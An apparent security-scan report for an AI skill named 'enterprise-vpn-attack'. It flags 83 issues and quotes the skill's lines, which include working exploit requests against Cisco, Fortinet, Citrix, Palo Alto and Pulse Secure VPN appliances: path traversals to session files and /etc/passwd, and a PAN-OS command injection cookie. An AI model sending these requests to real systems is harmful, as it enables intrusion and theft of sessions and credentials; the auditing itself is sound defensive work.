enterprise-vpn-attack
Analyzes and exploits vulnerabilities in SSL VPN appliances, providing a comprehensive attack matrix for various platforms.
Install this skill
or
0/100
Security score
The enterprise-vpn-attack skill was audited on May 29, 2026 and we found 83 security issues across 4 threat categories, including 1 critical. Review the findings below before installing.
Categories Tested
Security Issues
medium line 244
Template literal with variable interpolation in command context
SourceSKILL.md
| 244 | ```bash |
medium line 28
Curl to non-GitHub URL
SourceSKILL.md
| 28 | curl -skI 'https://target/+CSCOE+/logon.html' | head -10 |
medium line 36
Curl to non-GitHub URL
SourceSKILL.md
| 36 | curl -sk 'https://target/+CSCOE+/sdesktop/scan-finalize?path=test' |
medium line 37
Curl to non-GitHub URL
SourceSKILL.md
| 37 | curl -sk 'https://target/+CSCOE+/saml/sp/metadata' # 200 = SAML auth enabled |
medium line 38
Curl to non-GitHub URL
SourceSKILL.md
| 38 | curl -sk 'https://target/CSCOSSLC/config-auth' # AnyConnect handshake endpoint |
medium line 43
Curl to non-GitHub URL
SourceSKILL.md
| 43 | curl -skI 'https://target/remote/login' | head -10 |
medium line 51
Curl to non-GitHub URL
SourceSKILL.md
| 51 | curl -skI 'https://target/' | head -10 |
medium line 56
Curl to non-GitHub URL
SourceSKILL.md
| 56 | curl -sk 'https://target/vpn/index.html' | grep -oE 'NetScaler/[0-9.]+|NS[0-9.]+' |
medium line 57
Curl to non-GitHub URL
SourceSKILL.md
| 57 | curl -sk 'https://target/menu/neo' # 200 if vulnerable to CVE-2019-19781 era |
medium line 62
Curl to non-GitHub URL
SourceSKILL.md
| 62 | curl -skI 'https://target/global-protect/login.esp' | head -10 |
medium line 67
Curl to non-GitHub URL
SourceSKILL.md
| 67 | curl -sk 'https://target/global-protect/login.esp' | grep -oE 'GlobalProtect Portal[\s\S]{0,200}' |
medium line 69
Curl to non-GitHub URL
SourceSKILL.md
| 69 | curl -sk 'https://target/global-protect/login.esp' | grep -oE 'panui-[0-9.]+' |
medium line 74
Curl to non-GitHub URL
SourceSKILL.md
| 74 | curl -skI 'https://target/dana-na/auth/url_default/welcome.cgi' | head -10 |
medium line 79
Curl to non-GitHub URL
SourceSKILL.md
| 79 | curl -sk 'https://target/dana-na/auth/url_default/welcome.cgi' | grep -oE 'Pulse Connect Secure[^<]*|ivanti[^<]*[0-9.]+' |
medium line 84
Curl to non-GitHub URL
SourceSKILL.md
| 84 | curl -skI 'https://target/cgi-bin/welcome' | head -10 |
medium line 91
Curl to non-GitHub URL
SourceSKILL.md
| 91 | curl -skI 'https://target/my.policy' | head -10 |
medium line 111
Curl to non-GitHub URL
SourceSKILL.md
| 111 | curl -sk 'https://target/+CSCOE+/files/file_name.html?Filename=Microsoft.Manifest+/+CSCOT+/lua/test.lua' | head -5 |
medium line 114
Curl to non-GitHub URL
SourceSKILL.md
| 114 | curl -sk 'https://target/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua' | head -20 |
medium line 134
Curl to non-GitHub URL
SourceSKILL.md
| 134 | curl -sk --path-as-is 'https://target/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession' |
medium line 153
Curl to non-GitHub URL
SourceSKILL.md
| 153 | curl -sk -X POST -H "Host: $HOST" "https://target/oauth/idp/.well-known/openid-configuration" -o response.txt |
medium line 158
Curl to non-GitHub URL
SourceSKILL.md
| 158 | curl -sk --path-as-is 'https://target/vpn/../vpns/cfg/smb.conf' |
medium line 169
Curl to non-GitHub URL
SourceSKILL.md
| 169 | curl -sk -X POST 'https://target/ssl-vpn/login.esp' \ |
medium line 186
Curl to non-GitHub URL
SourceSKILL.md
| 186 | curl -sk --path-as-is 'https://target/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/' |
medium line 204
Curl to non-GitHub URL
SourceSKILL.md
| 204 | curl -sk 'https://target/+CSCOE+/saml/sp/metadata' | head -50 |
medium line 207
Curl to non-GitHub URL
SourceSKILL.md
| 207 | curl -sk 'https://target/remote/saml/metadata' | head -50 |
medium line 210
Curl to non-GitHub URL
SourceSKILL.md
| 210 | curl -sk 'https://target/saml/login' | head -30 |
medium line 282
Curl to non-GitHub URL
SourceSKILL.md
| 282 | curl -skI "https://$TARGET/+CSCOE+/logon.html" 2>&1 | head -3 |
medium line 283
Curl to non-GitHub URL
SourceSKILL.md
| 283 | curl -sk "https://$TARGET/+CSCOE+/saml/sp/metadata" -o /tmp/cisco_saml.xml; ls -la /tmp/cisco_saml.xml |
medium line 284
Curl to non-GitHub URL
SourceSKILL.md
| 284 | curl -sk --path-as-is "https://$TARGET/+CSCOE+/files/file_name.html?Filename=Microsoft.Manifest" -o /tmp/cisco_cve.html |
medium line 287
Curl to non-GitHub URL
SourceSKILL.md
| 287 | curl -skI "https://$TARGET/remote/login" 2>&1 | head -3 |
medium line 288
Curl to non-GitHub URL
SourceSKILL.md
| 288 | curl -sk --path-as-is "https://$TARGET/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" -o /tmp/forti_cve.txt; head -c 200 /tmp/forti_cve.txt |
medium line 291
Curl to non-GitHub URL
SourceSKILL.md
| 291 | curl -skI "https://$TARGET/" 2>&1 | head -3 |
medium line 292
Curl to non-GitHub URL
SourceSKILL.md
| 292 | curl -sk --path-as-is "https://$TARGET/vpn/../vpns/cfg/smb.conf" -o /tmp/citrix_cve.txt; head -c 200 /tmp/citrix_cve.txt |
medium line 294
Curl to non-GitHub URL
SourceSKILL.md
| 294 | curl -sk -X POST -H "Host: $HOST" "https://$TARGET/oauth/idp/.well-known/openid-configuration" -o /tmp/citrix_bleed.txt |
medium line 298
Curl to non-GitHub URL
SourceSKILL.md
| 298 | curl -skI "https://$TARGET/global-protect/login.esp" 2>&1 | head -3 |
medium line 301
Curl to non-GitHub URL
SourceSKILL.md
| 301 | curl -skI "https://$TARGET/dana-na/auth/url_default/welcome.cgi" 2>&1 | head -3 |
medium line 302
Curl to non-GitHub URL
SourceSKILL.md
| 302 | curl -sk --path-as-is "https://$TARGET/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/" -o /tmp/pulse_cve.txt; head -c 200 /tmp/pulse_cve.txt |
critical line 179
Access to /etc/passwd
SourceSKILL.md
| 179 | | **CVE-2019-11510** | Pulse Connect Secure 8.x-9.x | Arbitrary file read | `GET /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/` | |
high line 186
Access to /etc/passwd
SourceSKILL.md
| 186 | curl -sk --path-as-is 'https://target/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/' |
high line 302
Access to /etc/passwd
SourceSKILL.md
| 302 | curl -sk --path-as-is "https://$TARGET/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/" -o /tmp/pulse_cve.txt; head -c 200 /tmp/pulse_cve.txt |
high line 165
Path traversal to sensitive directory
SourceSKILL.md
| 165 | | **CVE-2024-3400** | PAN-OS 10.2-11.1 with GP enabled | Command injection — pre-auth RCE | `POST /ssl-vpn/login.esp` with crafted Cookie header containing `SESSID=../../../var/log/pan/test.txt` | |
medium line 170
Path traversal to sensitive directory
SourceSKILL.md
| 170 | -H 'Cookie: SESSID=../../../var/log/pan/test_$(id)_test.txt' \ |
high line 179
Path traversal to sensitive directory
SourceSKILL.md
| 179 | | **CVE-2019-11510** | Pulse Connect Secure 8.x-9.x | Arbitrary file read | `GET /dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/` | |
medium line 186
Path traversal to sensitive directory
SourceSKILL.md
| 186 | curl -sk --path-as-is 'https://target/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/' |
medium line 302
Path traversal to sensitive directory
SourceSKILL.md
| 302 | curl -sk --path-as-is "https://$TARGET/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/" -o /tmp/pulse_cve.txt; head -c 200 /tmp/pulse_cve.txt |
low line 28
External URL reference
SourceSKILL.md
| 28 | curl -skI 'https://target/+CSCOE+/logon.html' | head -10 |
low line 36
External URL reference
SourceSKILL.md
| 36 | curl -sk 'https://target/+CSCOE+/sdesktop/scan-finalize?path=test' |
low line 37
External URL reference
SourceSKILL.md
| 37 | curl -sk 'https://target/+CSCOE+/saml/sp/metadata' # 200 = SAML auth enabled |
low line 38
External URL reference
SourceSKILL.md
| 38 | curl -sk 'https://target/CSCOSSLC/config-auth' # AnyConnect handshake endpoint |
low line 43
External URL reference
SourceSKILL.md
| 43 | curl -skI 'https://target/remote/login' | head -10 |
low line 51
External URL reference
SourceSKILL.md
| 51 | curl -skI 'https://target/' | head -10 |
low line 56
External URL reference
SourceSKILL.md
| 56 | curl -sk 'https://target/vpn/index.html' | grep -oE 'NetScaler/[0-9.]+|NS[0-9.]+' |
low line 57
External URL reference
SourceSKILL.md
| 57 | curl -sk 'https://target/menu/neo' # 200 if vulnerable to CVE-2019-19781 era |
low line 62
External URL reference
SourceSKILL.md
| 62 | curl -skI 'https://target/global-protect/login.esp' | head -10 |
low line 67
External URL reference
SourceSKILL.md
| 67 | curl -sk 'https://target/global-protect/login.esp' | grep -oE 'GlobalProtect Portal[\s\S]{0,200}' |
low line 69
External URL reference
SourceSKILL.md
| 69 | curl -sk 'https://target/global-protect/login.esp' | grep -oE 'panui-[0-9.]+' |
low line 74
External URL reference
SourceSKILL.md
| 74 | curl -skI 'https://target/dana-na/auth/url_default/welcome.cgi' | head -10 |
low line 79
External URL reference
SourceSKILL.md
| 79 | curl -sk 'https://target/dana-na/auth/url_default/welcome.cgi' | grep -oE 'Pulse Connect Secure[^<]*|ivanti[^<]*[0-9.]+' |
low line 84
External URL reference
SourceSKILL.md
| 84 | curl -skI 'https://target/cgi-bin/welcome' | head -10 |
low line 91
External URL reference
SourceSKILL.md
| 91 | curl -skI 'https://target/my.policy' | head -10 |
low line 111
External URL reference
SourceSKILL.md
| 111 | curl -sk 'https://target/+CSCOE+/files/file_name.html?Filename=Microsoft.Manifest+/+CSCOT+/lua/test.lua' | head -5 |
low line 114
External URL reference
SourceSKILL.md
| 114 | curl -sk 'https://target/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua' | head -20 |
low line 134
External URL reference
SourceSKILL.md
| 134 | curl -sk --path-as-is 'https://target/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession' |
low line 153
External URL reference
SourceSKILL.md
| 153 | curl -sk -X POST -H "Host: $HOST" "https://target/oauth/idp/.well-known/openid-configuration" -o response.txt |
low line 158
External URL reference
SourceSKILL.md
| 158 | curl -sk --path-as-is 'https://target/vpn/../vpns/cfg/smb.conf' |
low line 169
External URL reference
SourceSKILL.md
| 169 | curl -sk -X POST 'https://target/ssl-vpn/login.esp' \ |
low line 186
External URL reference
SourceSKILL.md
| 186 | curl -sk --path-as-is 'https://target/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/' |
low line 204
External URL reference
SourceSKILL.md
| 204 | curl -sk 'https://target/+CSCOE+/saml/sp/metadata' | head -50 |
low line 207
External URL reference
SourceSKILL.md
| 207 | curl -sk 'https://target/remote/saml/metadata' | head -50 |
low line 210
External URL reference
SourceSKILL.md
| 210 | curl -sk 'https://target/saml/login' | head -30 |
low line 248
External URL reference
SourceSKILL.md
| 248 | -X POST "https://target/+webvpn+/index.html" \ |
low line 282
External URL reference
SourceSKILL.md
| 282 | curl -skI "https://$TARGET/+CSCOE+/logon.html" 2>&1 | head -3 |
low line 283
External URL reference
SourceSKILL.md
| 283 | curl -sk "https://$TARGET/+CSCOE+/saml/sp/metadata" -o /tmp/cisco_saml.xml; ls -la /tmp/cisco_saml.xml |
low line 284
External URL reference
SourceSKILL.md
| 284 | curl -sk --path-as-is "https://$TARGET/+CSCOE+/files/file_name.html?Filename=Microsoft.Manifest" -o /tmp/cisco_cve.html |
low line 287
External URL reference
SourceSKILL.md
| 287 | curl -skI "https://$TARGET/remote/login" 2>&1 | head -3 |
low line 288
External URL reference
SourceSKILL.md
| 288 | curl -sk --path-as-is "https://$TARGET/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession" -o /tmp/forti_cve.txt; head -c 200 /tmp/forti_cve.txt |
low line 291
External URL reference
SourceSKILL.md
| 291 | curl -skI "https://$TARGET/" 2>&1 | head -3 |
low line 292
External URL reference
SourceSKILL.md
| 292 | curl -sk --path-as-is "https://$TARGET/vpn/../vpns/cfg/smb.conf" -o /tmp/citrix_cve.txt; head -c 200 /tmp/citrix_cve.txt |
low line 294
External URL reference
SourceSKILL.md
| 294 | curl -sk -X POST -H "Host: $HOST" "https://$TARGET/oauth/idp/.well-known/openid-configuration" -o /tmp/citrix_bleed.txt |
low line 298
External URL reference
SourceSKILL.md
| 298 | curl -skI "https://$TARGET/global-protect/login.esp" 2>&1 | head -3 |
low line 301
External URL reference
SourceSKILL.md
| 301 | curl -skI "https://$TARGET/dana-na/auth/url_default/welcome.cgi" 2>&1 | head -3 |
low line 302
External URL reference
SourceSKILL.md
| 302 | curl -sk --path-as-is "https://$TARGET/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/" -o /tmp/pulse_cve.txt; head -c 200 /tmp/pulse_cve.txt |
low line 312
External URL reference
SourceSKILL.md
| 312 | nuclei -u https://target/ \ |
Scanned on May 29, 2026
View Security Dashboard